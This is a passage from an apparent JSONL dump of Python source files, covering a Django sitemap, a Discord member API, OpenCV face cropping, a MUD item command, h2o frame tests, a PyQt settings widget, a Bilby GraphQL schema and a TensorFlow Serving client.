print(\"<5\")\n#\n# elif num == 5:\n# print(\"=5\")\n#\n# else:\n# print(\"none\")\n#\n# ---------------------------------------\n\nday = input()\nprint(\"Enter number: \")\n\nif day == \"Monday\":\n num1 = float(input())\nelse:\n num2 = float(input())\n\n"} {"ext": "py", "sha": "1a3101290aefac2c3fe498e530eaa3edb98b8225", "content": "from django.contrib.gis.sitemaps import KMLSitemap, KMZSitemap\n\nfrom .models import City, Country\n\nsitemaps = {'kml': KMLSitemap([City, Country]),\n 'kmz': KMZSitemap([City, Country]),\n }\n"} {"ext": "py", "sha": "1a31015e3e28cb3d3542d5909701e2db8a488feb", "content": "from aiohttp import web\nfrom utils.utils import *\n\ndef get_members(request, client):\n try:\n role_ids = request.query[\"ids\"].split(\",\")\n guild = client.get_guild(client.config[\"main_guild_id\"])\n roles = [get(guild.roles, id=int(role_id)) for role_id in role_ids]\n members = [role.members for role in roles]\n except KeyError:\n return web.json_response({\"error\": \"You did not provide the correct query param ids\"})\n except AttributeError:\n return web.json_response({\"error\": \"Invalid Guild ID or Role ID 
provided\"})\n\n member_data = [\n {\n \"name\": member.name,\n \"id\": member.id,\n \"discriminator\": member.discriminator,\n } for member in [m for m in members][0]\n ]\n\n return web.json_response({\"member_data\": member_data})"} {"ext": "py", "sha": "1a310169466228b42bef45a2100691bcc0b57baa", "content": "\nimport os\nimport cv2\n\ncascPath = \"./haarcascades/haarcascade_frontalface_alt.xml\"\ninput_dir = './lfw'\noutput_dir = './other_faces'\nif not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n# classifiers\nfaceCascade = cv2.CascadeClassifier(cascPath)\n\nindex = 1\nfor (path,dirnames,filenames) in os.walk(input_dir):\n for filename in filenames:\n if filename.endswith('.jpg'):\n print('处理picture %s'%index)\n image = cv2.imread(path + '/' + filename)\n gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n\n # Detect faces in the image\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.3,\n minNeighbors=5,\n minSize=(30, 30)\n )\n\n # Draw a rectangle around the faces\n for (x, y, w, h) in faces:\n cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)\n \n image = image[y:y+h,x:x+w]\n image = cv2.resize(image,(64,64))\n cv2.imshow('image',image)\n cv2.imwrite(output_dir+'/'+str(index)+'.jpg',image)\n index +=1\n if cv2.waitKey(30) & 0xFF == ord('q'):\n break \ncv2.destroyAllWindows()\n"} {"ext": "py", "sha": "1a3102afdbde15af0544f1b7b4352399787fd819", "content": "#######################\n# Dennis MUD #\n# remake_item.py #\n# Copyright 2018-2020 #\n# Michael D. Reiley #\n#######################\n\n# **********\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n# **********\n\nNAME = \"remake item\"\nCATEGORIES = [\"items\"]\nUSAGE = \"remake item <item_id>\"\nDESCRIPTION = \"\"\"Resets the item <item_id> in your inventory.\n\nName and ID are untouched, you must be the primary owner of the item.\nOwners are reset to the primary owner only. Wizards can remake any item.\n\nEx. 
`remake item 3`\"\"\"\n\n\ndef COMMAND(console, args):\n # Perform initial checks.\n if not COMMON.check(NAME, console, args, argmin=1, argmax=1):\n return False\n\n # Perform argument type checks and casts.\n itemid = COMMON.check_argtypes(NAME, console, args, checks=[[0, int]], retargs=0)\n if itemid is None:\n return False\n\n # Lookup the target item and perform item checks.\n thisitem = COMMON.check_item(NAME, console, itemid, owner=True, primary=True, holding=True)\n if not thisitem:\n return False\n\n # remake the item.\n if len(thisitem[\"container\"][\"inventory\"])>0:\n console.msg(\"{0} is not empty, please empty it before remaking.\".format(thisitem[\"name\"]))\n return False\n if thisitem[\"duplified\"]:\n console.msg(\"Please unduplify this item before remaking.\")\n return False\n thisitem[\"desc\"] = \"\"\n thisitem[\"action\"] = \"\"\n thisitem[\"message\"] = \"\"\n thisitem[\"mlang\"] = None\n thisitem[\"lang\"] = None\n thisitem[\"owners\"] = [console.user[\"name\"]]\n thisitem[\"glued\"] = console.database.defaults[\"items\"][\"glued\"]\n thisitem[\"hidden\"] = False\n thisitem[\"truehide\"] = False\n thisitem[\"chance\"] = 1\n thisitem[\"container\"][\"enabled\"] = False\n thisitem[\"container\"][\"inventory\"] = []\n thisitem[\"telekey\"] = None\n console.database.upsert_item(thisitem)\n\n # Finished.\n console.msg(\"{0}: Done.\".format(NAME))\n return True\n\n"} {"ext": "py", "sha": "1a3103ac288270399cc51fa60266f9cce7700cd7", "content": "import sys\nsys.path.insert(1,\"../../\")\nimport h2o\nfrom tests import pyunit_utils\nimport numpy as np\nimport pandas as pd\n\ndef to_H2OFrame():\n\n # TODO: negative testing\n\n ## 1. list\n # a. single col\n python_obj = [1, \"a\", 2.5, \"bcd\", 0]\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=1, cols=5)\n\n # b. 1 col, 5 rows\n python_obj = [[1], [2], [3.7], [8], [9]]\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=1)\n\n # c. 5 cols, 3 rows\n python_obj = [[6,7,8,9,10], [1,2,3,4,5], [3,2,2,2,2]]\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5)\n\n python_obj = [[\"a\", \"b\"], [\"c\", \"d\"]]\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=2, cols=2)\n\n # d. jagged\n python_obj = [[6,7,8,9,10], [1,2,3,4], [3,2,2]]\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5, dim_only=True)\n\n\n ## 2. tuple\n # a. single row\n python_obj = (1, \"a\", 2.5, \"bcd\", 0)\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=1, cols=5)\n\n # b. single column\n python_obj = ((1,), (2,), (3.7,), (8,), (9,))\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=1)\n\n # c. multiple rows, columns\n python_obj = ((6,7,8,9,10), (1,2,3,4,5), (3,2,2,2,2))\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5)\n\n # d. jagged\n python_obj = ((6,7,8,9,10), (1,2,3,4), (3,2,2))\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5, dim_only=True)\n\n ## 3. list-tuple mixed\n # a. single column\n python_obj = ((1,), [2], (3.7,), [8], (9,))\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=1)\n\n # b. 
single column\n python_obj = [(1,), [2], (3.7,), [8], (9,)]\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=1)\n\n # c. multiple rows, columns\n python_obj = ([6,7,8,9,10], (1,2,3,4,5), [3,2,2,2,2])\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5)\n\n # d. multiple rows, columns\n python_obj = [(6,7,8,9,10), [1,2,3,4,5], (3,2,2,2,2)]\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5)\n\n # e. jagged\n python_obj = [(6,7,8,9,10), [1,2,3,4], (3,2,2)]\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5, dim_only=True)\n\n # f. jagged\n python_obj = ((6,7,8,9,10), [1,2,3,4], (3,2,2))\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5, dim_only=True)\n\n # 4. dictionary\n # a. single row\n python_obj = {\"a\":1, \"b\":\"a\", \"c\":2.5, \"d\":\"bcd\", \"e\":0}\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=1, cols=5)\n assert set(the_frame.names) == set(python_obj.keys()), \"H2OFrame header is hosed. Got {0}, but should have got \" \\\n \"{1}\".format(the_frame.names, python_obj.keys())\n\n python_obj = {\"a\":[1], \"b\":[\"a\"], \"c\":[2.5], \"d\":[\"bcd\"], \"e\":[0]}\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=1, cols=5)\n assert set(the_frame.names) == set(python_obj.keys()), \"H2OFrame header is hosed. Got {0}, but should have got \" \\\n \"{1}\".format(the_frame.names, python_obj.keys())\n\n # b. single column\n python_obj = {\"foo\":(1,2,3.7,8,9)}\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=1)\n assert set(the_frame.names) == set(python_obj.keys()), \"H2OFrame header is hosed. Got {0}, but should have got \" \\\n \"{1}\".format(the_frame.names, python_obj.keys())\n\n # c. multiple rows, columns\n python_obj = {\"foo\":[6,7,8,9,10], \"bar\":(1,2,3,4,5), \"baz\":(3,2,2,2,2)}\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=3)\n assert set(the_frame.names) == set(python_obj.keys()), \"H2OFrame header is hosed. Got {0}, but should have got \" \\\n \"{1}\".format(the_frame.names, python_obj.keys())\n\n # d. jagged\n python_obj = {\"foo\":(6,7), \"bar\":(1,2,3,4), \"baz\":(3,2,2)}\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=4, cols=3, dim_only=True)\n assert set(the_frame.names) == set(python_obj.keys()), \"H2OFrame header is hosed. Got {0}, but should have got \" \\\n \"{1}\".format(the_frame.names, python_obj.keys())\n\n # 5. numpy.ndarray\n # a. single row\n python_obj = np.array([1, \"a\", 2.5, \"bcd\", 0])\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=1, cols=5)\n\n # b. single column\n python_obj = np.array([[1], [2], [3.7], [8], [9]])\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=1)\n\n # c. multiple rows, columns\n python_obj = np.array([[6,7,8,9,10], [1,2,3,4,5], [3,2,2,2,2]])\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5)\n\n # d. 
jagged\n python_obj = np.array([[6,7,8,9,10], [1,2,3,4], [3,2,2]])\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5)\n\n ## 6. pandas.DataFrame\n # a. single row\n python_obj = pd.DataFrame({'foo' : pd.Series([1]), 'bar' : pd.Series([6]), 'baz' : pd.Series([\"a\"]) })\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=1, cols=3)\n\n # b. single column\n python_obj = pd.DataFrame({'foo' : pd.Series([1, 2, 3, 7.8, 9])})\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=1)\n\n # c. multiple rows, columns\n python_obj = pd.DataFrame({'foo' : pd.Series([6,7,8,9,10]), 'bar' : pd.Series([1,2,3,4,5]),\n 'baz' : pd.Series([3,2,2,2,2])})\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=3)\n\n # d. jagged\n python_obj = pd.DataFrame({'foo' : pd.Series([6,7,8]), 'bar' : pd.Series([1,2,3,4,5]), 'baz' : pd.Series([3,2,2,2])})\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=3)\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(to_H2OFrame)\nelse:\n to_H2OFrame()\n"} {"ext": "py", "sha": "1a3103c1fcfad091e66562acbb5d1c324b6e4c8f", "content": "# -*- coding: utf-8 -*-\n\"\"\"\n\n mslib.msui.performance_settings\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n This module defines the performance settings dialog\n\n This file is part of mss.\n\n :copyright: Copyright 2017 Joern Ungermann\n :copyright: Copyright 2017-2022 by the mss team, see AUTHORS.\n :license: APACHE-2.0, see LICENSE for details.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nimport json\n\nfrom PyQt5 import QtCore, QtWidgets\n\nfrom mslib.utils import FatalUserError\nfrom mslib.msui import aircrafts, constants\nfrom mslib.msui.mss_qt import get_open_filename\nfrom mslib.msui.mss_qt import ui_performance_dockwidget as ui_dw\n\n\nDEFAULT_PERFORMANCE = {\n \"aircraft\": aircrafts.SimpleAircraft(aircrafts.AIRCRAFT_DUMMY),\n \"visible\": False,\n \"takeoff_weight\": 0,\n \"takeoff_time\": QtCore.QDateTime.currentDateTimeUtc(),\n \"empty_weight\": 0,\n \"ceiling_alt\": [410],\n}\n\n\nclass MSS_PerformanceSettingsWidget(QtWidgets.QWidget, ui_dw.Ui_PerformanceDockWidget):\n \"\"\"\n This class implements setting the performance settings as a dockable widget.\n \"\"\"\n\n def __init__(self, parent=None, view=None, settings_dict=None):\n \"\"\"\n Arguments:\n parent -- Qt widget that is parent to this widget.\n view -- reference to mpl canvas class\n settings_dict -- dictionary containing topview options\n \"\"\"\n super(MSS_PerformanceSettingsWidget, self).__init__(parent)\n self.setupUi(self)\n self.view = view\n self.parent = parent\n\n if not settings_dict:\n settings_dict = DEFAULT_PERFORMANCE\n self.aircraft = settings_dict[\"aircraft\"]\n self.lbAircraftName.setText(self.aircraft.name)\n self.cbShowPerformance.setChecked(settings_dict[\"visible\"])\n 
self.dsbTakeoffWeight.setValue(settings_dict[\"takeoff_weight\"])\n self.dsbEmptyWeight.setValue(\n settings_dict.get(\"empty_weight\", settings_dict[\"takeoff_weight\"] - settings_dict.get(\"fuel\", 0)))\n self.dteTakeoffTime.setDateTime(settings_dict[\"takeoff_time\"])\n\n # Connecting signals\n self.pbLoadPerformance.clicked.connect(self.load_performance)\n self.cbShowPerformance.stateChanged.connect(self.update_parent_performance)\n self.dteTakeoffTime.dateTimeChanged.connect(self.update_parent_performance)\n self.dsbTakeoffWeight.valueChanged.connect(self.update_parent_performance)\n self.dsbEmptyWeight.valueChanged.connect(self.update_parent_performance)\n\n def get_settings(self):\n \"\"\"\n Encapsulates GUI selections in a python dictionary.\n\n :return:\n Dictionary of all setting informations\n \"\"\"\n settings_dict = {\n \"aircraft\": self.aircraft,\n \"visible\": self.cbShowPerformance.isChecked(),\n \"takeoff_time\": self.dteTakeoffTime.dateTime(),\n \"takeoff_weight\": self.dsbTakeoffWeight.value(),\n \"empty_weight\": self.dsbEmptyWeight.value()\n }\n return settings_dict\n\n def update_parent_performance(self):\n self.parent.setPerformance(self.get_settings())\n\n def load_performance(self):\n \"\"\"\n Gets a filename for a JSON file specifying aircraft performance and initializes an SimpleAircraft model.\n \"\"\"\n filename = get_open_filename(\n self, \"Open Aircraft Performance JSON File\", constants.MSS_CONFIG_PATH,\n \"Performance File (*.json)\", pickertag=\"filepicker_default\")\n if filename is not None:\n try:\n with open(filename) as tf:\n performance = json.load(tf)\n self.aircraft = aircrafts.SimpleAircraft(performance)\n self.lbAircraftName.setText(self.aircraft.name)\n self.dsbTakeoffWeight.setValue(self.aircraft.takeoff_weight)\n if not any(hasattr(self.aircraft, _x) for _x in (\"fuel\", \"empty_weight\")):\n raise KeyError(\"empty_weight\")\n if hasattr(self.aircraft, \"empty_weight\"):\n self.dsbEmptyWeight.setValue(self.aircraft.empty_weight)\n else:\n self.dsbEmptyWeight.setValue(self.aircraft.takeoff_weight - self.aircraft.fuel)\n\n self.update_parent_performance()\n\n except KeyError as ex:\n QtWidgets.QMessageBox.critical(self, self.tr(\"Performance JSON Load\"),\n self.tr(f\"JSON File missing '{ex}' entry\"))\n except (FatalUserError, ValueError) as ex:\n QtWidgets.QMessageBox.critical(self, self.tr(\"Performance JSON Load\"),\n self.tr(f\"JSON File has Syntax Problems:\\n{ex}\"))\n"} {"ext": "py", "sha": "1a31053b4ca3d68aa8882dcde6023d66256beb2d", "content": "from decimal import Decimal\n\nimport graphene\nfrom django_filters import FilterSet, OrderingFilter\nfrom graphene import relay\nfrom graphene_django.filter import DjangoFilterConnectionField\nfrom graphene_django.types import DjangoObjectType\nfrom graphene_file_upload.scalars import Upload\nfrom graphql import GraphQLError\nfrom graphql_jwt.decorators import login_required\nfrom graphql_relay.node.node import from_global_id, to_global_id\n\nfrom .models import BilbyJob, Label, FileDownloadToken, BilbyJobUploadToken\nfrom .status import JobStatus\nfrom .types import JobStatusType, BilbyJobCreationResult, JobParameterInput, JobParameterOutput, JobIniInput, \\\n JobDetailsInput\nfrom .utils.db_search.db_search import perform_db_search\nfrom .utils.derive_job_status import derive_job_status\nfrom .utils.gen_parameter_output import generate_parameter_output\nfrom .utils.jobs.request_file_download_id import request_file_download_ids\nfrom .utils.jobs.request_job_filter import 
request_job_filter\nfrom .views import create_bilby_job, update_bilby_job, create_bilby_job_from_ini_string, upload_bilby_job\n\n\nclass LabelType(DjangoObjectType):\n class Meta:\n model = Label\n interfaces = (relay.Node,)\n\n\nclass UserBilbyJobFilter(FilterSet):\n class Meta:\n model = BilbyJob\n fields = '__all__'\n\n order_by = OrderingFilter(\n fields=(\n ('last_updated', 'lastUpdated'),\n ('name', 'name'),\n )\n )\n\n @property\n def qs(self):\n return BilbyJob.user_bilby_job_filter(super(UserBilbyJobFilter, self).qs, self)\n\n\nclass PublicBilbyJobFilter(FilterSet):\n class Meta:\n model = BilbyJob\n fields = '__all__'\n\n order_by = OrderingFilter(\n fields=(\n ('last_updated', 'last_updated'),\n ('name', 'name'),\n )\n )\n\n @property\n def qs(self):\n return BilbyJob.public_bilby_job_filter(super(PublicBilbyJobFilter, self).qs, self)\n\n\nclass BilbyJobNode(DjangoObjectType):\n class Meta:\n model = BilbyJob\n convert_choices_to_enum = False\n interfaces = (relay.Node,)\n\n job_status = graphene.Field(JobStatusType)\n last_updated = graphene.String()\n params = graphene.Field(JobParameterOutput)\n labels = graphene.List(LabelType)\n\n @classmethod\n def get_queryset(parent, queryset, info):\n return BilbyJob.bilby_job_filter(queryset, info)\n\n def resolve_last_updated(parent, info):\n return parent.last_updated.strftime(\"%Y-%m-%d %H:%M:%S UTC\")\n\n def resolve_params(parent, info):\n return generate_parameter_output(parent)\n\n def resolve_labels(parent, info):\n return parent.labels.all()\n\n def resolve_job_status(parent, info):\n # Uploaded jobs are always complete\n if parent.is_uploaded_job:\n return {\n \"name\": JobStatus.display_name(JobStatus.COMPLETED),\n \"number\": JobStatus.COMPLETED,\n \"date\": parent.creation_time\n }\n\n try:\n # Get job details from the job controller\n _, jc_jobs = request_job_filter(\n info.context.user.user_id,\n ids=[parent.job_controller_id]\n )\n\n status_number, status_name, status_date = derive_job_status(jc_jobs[0][\"history\"])\n\n return {\n \"name\": status_name,\n \"number\": status_number,\n \"date\": status_date.strftime(\"%Y-%m-%d %H:%M:%S UTC\")\n }\n except Exception:\n return {\n \"name\": \"Unknown\",\n \"number\": 0,\n \"data\": \"Unknown\"\n }\n\n\nclass UserDetails(graphene.ObjectType):\n username = graphene.String()\n\n def resolve_username(parent, info):\n return \"Todo\"\n\n\nclass BilbyResultFile(graphene.ObjectType):\n path = graphene.String()\n is_dir = graphene.Boolean()\n file_size = graphene.Decimal()\n download_token = graphene.String()\n\n\nclass BilbyResultFiles(graphene.ObjectType):\n class Meta:\n interfaces = (relay.Node,)\n\n class Input:\n job_id = graphene.ID()\n\n files = graphene.List(BilbyResultFile)\n is_uploaded_job = graphene.Boolean()\n\n\nclass BilbyPublicJobNode(graphene.ObjectType):\n user = graphene.String()\n name = graphene.String()\n job_status = graphene.Field(JobStatusType)\n labels = graphene.List(LabelType)\n description = graphene.String()\n timestamp = graphene.String()\n id = graphene.ID()\n\n\nclass BilbyPublicJobConnection(relay.Connection):\n class Meta:\n node = BilbyPublicJobNode\n\n\nclass GenerateBilbyJobUploadToken(graphene.ObjectType):\n token = graphene.String()\n\n\nclass Query(object):\n bilby_job = relay.Node.Field(BilbyJobNode)\n bilby_jobs = DjangoFilterConnectionField(BilbyJobNode, filterset_class=UserBilbyJobFilter)\n public_bilby_jobs = relay.ConnectionField(\n BilbyPublicJobConnection,\n search=graphene.String(),\n time_range=graphene.String()\n )\n\n 
all_labels = graphene.List(LabelType)\n\n bilby_result_files = graphene.Field(BilbyResultFiles, job_id=graphene.ID(required=True))\n\n gwclouduser = graphene.Field(UserDetails)\n\n generate_bilby_job_upload_token = graphene.Field(GenerateBilbyJobUploadToken)\n\n @login_required\n def resolve_generate_bilby_job_upload_token(self, info, **kwargs):\n user = info.context.user\n\n # Create a job upload token\n token = BilbyJobUploadToken.create(user)\n\n # Return the generated token\n return GenerateBilbyJobUploadToken(token=str(token.token))\n\n @login_required\n def resolve_all_labels(self, info, **kwargs):\n return Label.all()\n\n @login_required\n def resolve_public_bilby_jobs(self, info, **kwargs):\n # Perform the database search\n success, jobs = perform_db_search(info.context.user, kwargs)\n if not success:\n return []\n\n # Parse the result in to graphql objects\n result = []\n for job in jobs:\n bilby_job = BilbyJob.get_by_id(job['job']['id'], info.context.user)\n result.append(\n BilbyPublicJobNode(\n user=f\"{job['user']['firstName']} {job['user']['lastName']}\",\n name=job['job']['name'],\n description=job['job']['description'],\n job_status=JobStatusType(\n name=JobStatus.display_name(\n JobStatus.COMPLETED if bilby_job.is_uploaded_job else job['history'][0]['state']\n ),\n number=JobStatus.COMPLETED if bilby_job.is_uploaded_job else job['history'][0]['state'],\n date=bilby_job.creation_time if bilby_job.is_uploaded_job else job['history'][0]['timestamp']\n ),\n labels=bilby_job.labels.all(),\n timestamp=bilby_job.creation_time if bilby_job.is_uploaded_job else job['history'][0]['timestamp'],\n id=to_global_id(\"BilbyJobNode\", job['job']['id'])\n )\n )\n\n # Nb. The perform_db_search function currently requests one extra record than kwargs['first'].\n # This triggers the ArrayConnection used by returning the result array to correctly set\n # hasNextPage correctly, such that infinite scroll works as expected.\n return result\n\n @login_required\n def resolve_gwclouduser(self, info, **kwargs):\n return info.context.user\n\n @login_required\n def resolve_bilby_result_files(self, info, **kwargs):\n # Get the model id of the bilby job\n _, job_id = from_global_id(kwargs.get(\"job_id\"))\n\n # Try to look up the job with the id provided\n job = BilbyJob.get_by_id(job_id, info.context.user)\n\n # Fetch the file list from the job controller\n success, files = job.get_file_list()\n if not success:\n raise Exception(\"Error getting file list. 
\" + str(files))\n\n # Generate download tokens for the list of files\n paths = [f['path'] for f in filter(lambda x: not x['isDir'], files)]\n tokens = FileDownloadToken.create(job, paths)\n\n # Generate a dict that can be used to query the generated tokens\n token_dict = {tk.path: tk.token for tk in tokens}\n\n # Build the resulting file list and send it back to the client\n result = [\n BilbyResultFile(\n path=f[\"path\"],\n is_dir=f[\"isDir\"],\n file_size=Decimal(f[\"fileSize\"]),\n download_token=token_dict[f[\"path\"]] if f[\"path\"] in token_dict else None\n )\n for f in files\n ]\n\n return BilbyResultFiles(\n files=result,\n is_uploaded_job=job.is_uploaded_job\n )\n\n\nclass BilbyJobMutation(relay.ClientIDMutation):\n class Input:\n params = JobParameterInput()\n\n result = graphene.Field(BilbyJobCreationResult)\n\n @classmethod\n @login_required\n def mutate_and_get_payload(cls, root, info, params):\n user = info.context.user\n\n # Create the bilby job\n bilby_job = create_bilby_job(user, params)\n\n # Convert the bilby job id to a global id\n job_id = to_global_id(\"BilbyJobNode\", bilby_job.id)\n\n # Return the bilby job id to the client\n return BilbyJobMutation(\n result=BilbyJobCreationResult(job_id=job_id)\n )\n\n\nclass BilbyJobFromIniStringMutation(relay.ClientIDMutation):\n class Input:\n params = JobIniInput()\n\n result = graphene.Field(BilbyJobCreationResult)\n\n @classmethod\n @login_required\n def mutate_and_get_payload(cls, root, info, params):\n user = info.context.user\n\n # Create the bilby job\n bilby_job = create_bilby_job_from_ini_string(user, params)\n\n # Convert the bilby job id to a global id\n job_id = to_global_id(\"BilbyJobNode\", bilby_job.id)\n\n # Return the bilby job id to the client\n return BilbyJobFromIniStringMutation(\n result=BilbyJobCreationResult(job_id=job_id)\n )\n\n\nclass UpdateBilbyJobMutation(relay.ClientIDMutation):\n class Input:\n job_id = graphene.ID(required=True)\n private = graphene.Boolean(required=False)\n labels = graphene.List(graphene.String, required=False)\n\n result = graphene.String()\n\n @classmethod\n @login_required\n def mutate_and_get_payload(cls, root, info, **kwargs):\n user = info.context.user\n\n job_id = kwargs.pop(\"job_id\")\n\n # Update privacy of bilby job\n message = update_bilby_job(from_global_id(job_id)[1], user, **kwargs)\n\n # Return the bilby job id to the client\n return UpdateBilbyJobMutation(\n result=message\n )\n\n\nclass GenerateFileDownloadIds(relay.ClientIDMutation):\n class Input:\n job_id = graphene.ID(required=True)\n download_tokens = graphene.List(graphene.String, required=True)\n\n result = graphene.List(graphene.String)\n\n @classmethod\n @login_required\n def mutate_and_get_payload(cls, root, info, job_id, download_tokens):\n user = info.context.user\n\n # Get the job these file downloads are for\n job = BilbyJob.get_by_id(from_global_id(job_id)[1], user)\n\n # Verify the download tokens and get the paths\n paths = FileDownloadToken.get_paths(job, download_tokens)\n\n # Check that all tokens were found\n if None in paths:\n raise GraphQLError(\"At least one token was invalid or expired.\")\n\n # For uploaded jobs, we can just return the exact some download tokens - this function is basically a no-op\n # for uploaded jobs\n if job.is_uploaded_job:\n return GenerateFileDownloadIds(\n result=download_tokens\n )\n\n # Request the list of file download ids from the list of paths\n # Only the original job author may generate a file download id\n success, result = 
request_file_download_ids(\n job,\n paths\n )\n\n # Report the error if there is one\n if not success:\n raise GraphQLError(result)\n\n # Return the list of file download ids\n return GenerateFileDownloadIds(\n result=result\n )\n\n\nclass UploadBilbyJobMutation(relay.ClientIDMutation):\n class Input:\n upload_token = graphene.String()\n details = JobDetailsInput()\n job_file = Upload(required=True)\n\n result = graphene.Field(BilbyJobCreationResult)\n\n @classmethod\n def mutate_and_get_payload(cls, root, info, upload_token, details, job_file):\n # Get the token being used to perform the upload - this will return None if the token doesn't exist or\n # is expired\n token = BilbyJobUploadToken.get_by_token(upload_token)\n if not token:\n raise GraphQLError(\"Job upload token is invalid or expired.\")\n\n # Try uploading the bilby job\n bilby_job = upload_bilby_job(token, details, job_file)\n\n # Convert the bilby job id to a global id\n job_id = to_global_id(\"BilbyJobNode\", bilby_job.id)\n\n # Return the bilby job id to the client\n return BilbyJobMutation(\n result=BilbyJobCreationResult(job_id=job_id)\n )\n\n\nclass Mutation(graphene.ObjectType):\n new_bilby_job = BilbyJobMutation.Field()\n new_bilby_job_from_ini_string = BilbyJobFromIniStringMutation.Field()\n update_bilby_job = UpdateBilbyJobMutation.Field()\n generate_file_download_ids = GenerateFileDownloadIds.Field()\n upload_bilby_job = UploadBilbyJobMutation.Field()\n"} {"ext": "py", "sha": "1a310622a120177fc756747cbe7a63947853cc94", "content": "from grpc.beta import implementations\nimport numpy\nimport traceback\n\nimport tensorflow as tf\n\nfrom tensorflow_serving.apis import predict_pb2\nfrom tensorflow_serving.apis import prediction_service_pb2\n\nfrom flask_restplus import Resource, abort\n\nfrom monocker_api.api.restplus import restplus_api\nfrom monocker_api.api.models import getModel\nfrom monocker_api.db.data_models import PredictionRequest\nfrom monocker_api import settings\n\n#==============================================================================\n# helper functions\n#==============================================================================\ndef getMonockerModelStub(host, port):\n try:\n channel = implementations.insecure_channel(host, int(port))\n stub = prediction_service_pb2.beta_create_PredictionService_stub(channel)\n except Exception as e:\n print(\"===========================================================\")\n print(\"Encountered error while requesting gRPC connection.\")\n print(\"Error: \")\n print(e)\n traceback.print_exc()\n print(\"===========================================================\")\n stub = None\n return stub\n\n\ndef getServingRequest(model, payload):\n request = predict_pb2.PredictRequest()\n request.model_spec.name = model['model_name']\n request.model_spec.signature_name = model['model_signature']\n\n request.inputs['images'].CopyFrom(\n tf.contrib.util.make_tensor_proto(\n payload['model_input'], \n shape=payload['model_input_shape']\n )\n )\n\n return request\n#==============================================================================\n\n\n#==============================================================================\n# Models API \n#==============================================================================\n# define namespace\napi = restplus_api.namespace(\n 'predict', \n description=\"Operations related to requesting model evaluations\"\n)\n\n# Define /models route 